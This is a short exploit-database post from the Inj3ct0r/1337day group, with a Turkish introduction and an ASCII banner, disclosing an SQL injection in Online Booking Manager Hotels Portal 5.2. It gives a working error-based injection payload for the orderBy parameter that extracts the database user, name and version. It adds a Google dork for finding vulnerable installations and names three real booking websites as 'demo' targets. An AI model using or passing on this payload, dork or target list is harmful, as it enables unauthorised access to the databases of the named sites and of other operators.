Online Booking Manager Hotels Portal – SQLi Vulnerability
açık ve açığın kullanımı hakkında örnekler şu şekilde;
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm DaOne member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ########################################## # Exploit Title: Online Booking Manager Hotels Portal - SQLi Vulnerability # Date: 2012-10-19 # Author: DaOne aka Mocking Bird # Home: 1337day Inj3ct0r Exploit Database # Software Link: http://www.onlinebookingmanager.com/obm-portal-hotels/index.php # Category: webapps/php # Version: 5.2 # Price: 912 USD # Google dork: inurl:besthotels.php?portalID= ########################################## [#] Exploit: http://[host]/besthotels.php?orderBy=(ErrorBased Injection) orderBy=1+and(select 1 FROM(select count(*),concat((select (select concat(user(),database(),version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) # Demo: http://www.stayinkos.com/hotels/besthotels.php?orderBy=1' http://ahabooking.com/besthotels.php?orderBy=1' http://bookingeurope.co/besthotels.php?orderBy=1' ---- Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team.